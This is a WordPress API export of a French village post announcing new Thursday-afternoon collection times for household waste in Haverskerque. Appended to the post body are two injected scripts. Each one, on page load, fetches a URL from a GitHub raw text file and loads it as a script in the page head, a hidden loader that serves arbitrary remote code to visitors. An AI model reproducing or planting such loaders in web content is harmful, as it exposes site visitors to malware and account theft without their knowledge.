{"id":3897,"date":"2023-06-30T18:16:40","date_gmt":"2023-06-30T16:16:40","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=3897"},"modified":"2024-07-29T06:38:09","modified_gmt":"2024-07-29T04:38:09","slug":"dechets-nouveaux-horaires-de-collecte","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/","title":{"rendered":"Nouveaux horaires de collecte"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"8\" src=\"http:\/\/barbry.esy.es\/wp-content\/uploads\/2023\/07\/bande-environnement-1024x8.jpg\" alt=\"\" class=\"wp-image-4230\" srcset=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/07\/bande-environnement-1024x8.jpg 1024w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/07\/bande-environnement-300x2.jpg 300w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/07\/bande-environnement-768x6.jpg 768w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/07\/bande-environnement-1536x12.jpg 1536w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/07\/bande-environnement-2048x16.jpg 2048w, https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/07\/bande-environnement-1140x9.jpg 1140w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"74\" height=\"69\" src=\"http:\/\/barbry.esy.es\/wp-content\/uploads\/2023\/06\/attention-poubelle.jpg\" alt=\"\" class=\"wp-image-3898\"\/><\/figure>\n<\/div>\n\n\n<p>NOUVEAUX HORAIRES DE COLLECTE DES D\u00c9CHETS M\u00c9NAGERS \u00c0 HAVERSKERQUE<\/p>\n\n\n\n<p>Nous tenons \u00e0 vous informer d&rsquo;une modification importante concernant les horaires de collecte de vos d\u00e9chets m\u00e9nagers (bac noir) dans notre commune. Notre prestataire, Eco D\u00e9chets, en charge de la collecte des d\u00e9chets m\u00e9nagers et recyclables sur la Communaut\u00e9 de communes Flandres Lys, a pris la d\u00e9cision d&rsquo;optimiser ses tourn\u00e9es afin d&rsquo;am\u00e9liorer l&rsquo;efficacit\u00e9 de ses services.<\/p>\n\n\n\n<p>\u00c0 compter du jeudi 1er Juin 2023, la collecte des bacs d&rsquo;ordures m\u00e9nag\u00e8res \u00e0 Haverskerque sera d\u00e9sormais effectu\u00e9e le jeudi apr\u00e8s-midi \u00e0 partir de 12h00, au lieu du jeudi matin. Cette modification concerne exclusivement la collecte des d\u00e9chets m\u00e9nagers (bac noir). Les horaires de collecte des autres bacs (recyclables, compostables, etc.) restent inchang\u00e9s.<\/p>\n\n\n\n<p>Cette d\u00e9cision vise \u00e0 optimiser les tourn\u00e9es de collecte, ce qui permettra une meilleure organisation des ressources et une plus grande efficacit\u00e9 dans la gestion des d\u00e9chets. Nous comptons sur votre collaboration et votre compr\u00e9hension pour respecter ces nouveaux horaires afin de faciliter le travail de nos agents de collecte.<\/p>\n\n\n\n<p>Afin de garantir le bon d\u00e9roulement de la collecte, nous vous recommandons de sortir votre bac d&rsquo;ordures m\u00e9nag\u00e8res le jeudi matin avant 12h00, afin de vous assurer qu&rsquo;il soit collect\u00e9 dans les meilleurs d\u00e9lais.<\/p>\n\n\n\n<p>Nous vous invitons \u00e9galement \u00e0 consulter les documents d&rsquo;information fournis par Eco D\u00e9chets concernant les consignes de tri des d\u00e9chets recyclables. Le respect de ces consignes contribue \u00e0 une gestion responsable de nos d\u00e9chets et \u00e0 la pr\u00e9servation de notre environnement.<\/p>\n\n\n\n<p>Nous vous remercions de votre compr\u00e9hension et de votre coop\u00e9ration pour ces nouveaux horaires de collecte des d\u00e9chets m\u00e9nagers \u00e0 Haverskerque. Ensemble, nous contribuons \u00e0 cr\u00e9er un environnement plus propre et plus durable.<\/p>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>NOUVEAUX HORAIRES DE COLLECTE DES D\u00c9CHETS M\u00c9NAGERS \u00c0 HAVERSKERQUE Nous tenons \u00e0 vous informer d&rsquo;une modification importante concernant les horaires de collecte de vos d\u00e9chets m\u00e9nagers (bac noir) dans notre commune. Notre prestataire, Eco D\u00e9chets, en charge de la collecte des d\u00e9chets m\u00e9nagers et recyclables sur la Communaut\u00e9 de communes Flandres Lys, a pris la d\u00e9cision d&rsquo;optimiser ses tourn\u00e9es afin d&rsquo;am\u00e9liorer l&rsquo;efficacit\u00e9 de ses services. \u00c0 compter du jeudi 1er Juin 2023, la collecte des bacs d&rsquo;ordures m\u00e9nag\u00e8res \u00e0 Haverskerque sera d\u00e9sormais effectu\u00e9e le jeudi apr\u00e8s-midi \u00e0 partir de 12h00, au lieu du jeudi matin. Cette modification concerne exclusivement la collecte des d\u00e9chets m\u00e9nagers (bac noir). Les horaires de collecte des autres bacs (recyclables, compostables, etc.) restent inchang\u00e9s. Cette d\u00e9cision vise \u00e0 optimiser les tourn\u00e9es de collecte, ce qui permettra une meilleure organisation des ressources et une plus grande efficacit\u00e9 dans la gestion des d\u00e9chets. Nous comptons sur votre collaboration et votre compr\u00e9hension pour respecter ces nouveaux horaires afin de faciliter le travail de nos agents de collecte. Afin de garantir le bon d\u00e9roulement de la collecte, nous vous recommandons de sortir votre bac d&rsquo;ordures m\u00e9nag\u00e8res le jeudi matin avant 12h00, afin de vous assurer qu&rsquo;il soit collect\u00e9 dans les meilleurs d\u00e9lais. Nous vous invitons \u00e9galement \u00e0 consulter les documents d&rsquo;information fournis par Eco D\u00e9chets concernant les consignes de tri des d\u00e9chets recyclables. Le respect de ces consignes contribue \u00e0 une gestion responsable de nos d\u00e9chets et \u00e0 la pr\u00e9servation de notre environnement. Nous vous remercions de votre compr\u00e9hension et de votre coop\u00e9ration pour ces nouveaux horaires de collecte des d\u00e9chets m\u00e9nagers \u00e0 Haverskerque. Ensemble, nous contribuons \u00e0 cr\u00e9er un environnement plus propre et plus durable.<\/p>\n","protected":false},"author":1,"featured_media":5533,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[1],"tags":[],"class_list":["post-3897","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Nouveaux horaires de collecte * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Nouveaux horaires de collecte * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"NOUVEAUX HORAIRES DE COLLECTE DES D\u00c9CHETS M\u00c9NAGERS \u00c0 HAVERSKERQUE Nous tenons \u00e0 vous informer d&rsquo;une modification importante concernant les horaires de collecte de vos d\u00e9chets m\u00e9nagers (bac noir) dans notre commune. Notre prestataire, Eco D\u00e9chets, en charge de la collecte des d\u00e9chets m\u00e9nagers et recyclables sur la Communaut\u00e9 de communes Flandres Lys, a pris la d\u00e9cision d&rsquo;optimiser ses tourn\u00e9es afin d&rsquo;am\u00e9liorer l&rsquo;efficacit\u00e9 de ses services. \u00c0 compter du jeudi 1er Juin 2023, la collecte des bacs d&rsquo;ordures m\u00e9nag\u00e8res \u00e0 Haverskerque sera d\u00e9sormais effectu\u00e9e le jeudi apr\u00e8s-midi \u00e0 partir de 12h00, au lieu du jeudi matin. Cette modification concerne exclusivement la collecte des d\u00e9chets m\u00e9nagers (bac noir). Les horaires de collecte des autres bacs (recyclables, compostables, etc.) restent inchang\u00e9s. Cette d\u00e9cision vise \u00e0 optimiser les tourn\u00e9es de collecte, ce qui permettra une meilleure organisation des ressources et une plus grande efficacit\u00e9 dans la gestion des d\u00e9chets. Nous comptons sur votre collaboration et votre compr\u00e9hension pour respecter ces nouveaux horaires afin de faciliter le travail de nos agents de collecte. Afin de garantir le bon d\u00e9roulement de la collecte, nous vous recommandons de sortir votre bac d&rsquo;ordures m\u00e9nag\u00e8res le jeudi matin avant 12h00, afin de vous assurer qu&rsquo;il soit collect\u00e9 dans les meilleurs d\u00e9lais. Nous vous invitons \u00e9galement \u00e0 consulter les documents d&rsquo;information fournis par Eco D\u00e9chets concernant les consignes de tri des d\u00e9chets recyclables. Le respect de ces consignes contribue \u00e0 une gestion responsable de nos d\u00e9chets et \u00e0 la pr\u00e9servation de notre environnement. Nous vous remercions de votre compr\u00e9hension et de votre coop\u00e9ration pour ces nouveaux horaires de collecte des d\u00e9chets m\u00e9nagers \u00e0 Haverskerque. Ensemble, nous contribuons \u00e0 cr\u00e9er un environnement plus propre et plus durable.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2023-06-30T16:16:40+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:38:09+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/06\/une-dechet.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"857\" \/>\n\t<meta property=\"og:image:height\" content=\"400\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Nouveaux horaires de collecte\",\"datePublished\":\"2023-06-30T16:16:40+00:00\",\"dateModified\":\"2024-07-29T04:38:09+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/\"},\"wordCount\":311,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/une-dechet.jpg\",\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/\",\"name\":\"Nouveaux horaires de collecte * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/06\\\/une-dechet.jpg\",\"datePublished\":\"2023-06-30T16:16:40+00:00\",\"dateModified\":\"2024-07-29T04:38:09+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2023\\\/06\\\/30\\\/dechets-nouveaux-horaires-de-collecte\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Nouveaux horaires de collecte\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Nouveaux horaires de collecte * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/","og_locale":"fr_FR","og_type":"article","og_title":"Nouveaux horaires de collecte * Haverskerque, 100% Nature !*","og_description":"NOUVEAUX HORAIRES DE COLLECTE DES D\u00c9CHETS M\u00c9NAGERS \u00c0 HAVERSKERQUE Nous tenons \u00e0 vous informer d&rsquo;une modification importante concernant les horaires de collecte de vos d\u00e9chets m\u00e9nagers (bac noir) dans notre commune. Notre prestataire, Eco D\u00e9chets, en charge de la collecte des d\u00e9chets m\u00e9nagers et recyclables sur la Communaut\u00e9 de communes Flandres Lys, a pris la d\u00e9cision d&rsquo;optimiser ses tourn\u00e9es afin d&rsquo;am\u00e9liorer l&rsquo;efficacit\u00e9 de ses services. \u00c0 compter du jeudi 1er Juin 2023, la collecte des bacs d&rsquo;ordures m\u00e9nag\u00e8res \u00e0 Haverskerque sera d\u00e9sormais effectu\u00e9e le jeudi apr\u00e8s-midi \u00e0 partir de 12h00, au lieu du jeudi matin. Cette modification concerne exclusivement la collecte des d\u00e9chets m\u00e9nagers (bac noir). Les horaires de collecte des autres bacs (recyclables, compostables, etc.) restent inchang\u00e9s. Cette d\u00e9cision vise \u00e0 optimiser les tourn\u00e9es de collecte, ce qui permettra une meilleure organisation des ressources et une plus grande efficacit\u00e9 dans la gestion des d\u00e9chets. Nous comptons sur votre collaboration et votre compr\u00e9hension pour respecter ces nouveaux horaires afin de faciliter le travail de nos agents de collecte. Afin de garantir le bon d\u00e9roulement de la collecte, nous vous recommandons de sortir votre bac d&rsquo;ordures m\u00e9nag\u00e8res le jeudi matin avant 12h00, afin de vous assurer qu&rsquo;il soit collect\u00e9 dans les meilleurs d\u00e9lais. Nous vous invitons \u00e9galement \u00e0 consulter les documents d&rsquo;information fournis par Eco D\u00e9chets concernant les consignes de tri des d\u00e9chets recyclables. Le respect de ces consignes contribue \u00e0 une gestion responsable de nos d\u00e9chets et \u00e0 la pr\u00e9servation de notre environnement. Nous vous remercions de votre compr\u00e9hension et de votre coop\u00e9ration pour ces nouveaux horaires de collecte des d\u00e9chets m\u00e9nagers \u00e0 Haverskerque. Ensemble, nous contribuons \u00e0 cr\u00e9er un environnement plus propre et plus durable.","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2023-06-30T16:16:40+00:00","article_modified_time":"2024-07-29T04:38:09+00:00","og_image":[{"width":857,"height":400,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/06\/une-dechet.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Nouveaux horaires de collecte","datePublished":"2023-06-30T16:16:40+00:00","dateModified":"2024-07-29T04:38:09+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/"},"wordCount":311,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/06\/une-dechet.jpg","inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/","name":"Nouveaux horaires de collecte * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/06\/une-dechet.jpg","datePublished":"2023-06-30T16:16:40+00:00","dateModified":"2024-07-29T04:38:09+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2023\/06\/30\/dechets-nouveaux-horaires-de-collecte\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Nouveaux horaires de collecte"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/3897","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=3897"}],"version-history":[{"count":6,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/3897\/revisions"}],"predecessor-version":[{"id":8277,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/3897\/revisions\/8277"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/5533"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=3897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=3897"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=3897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}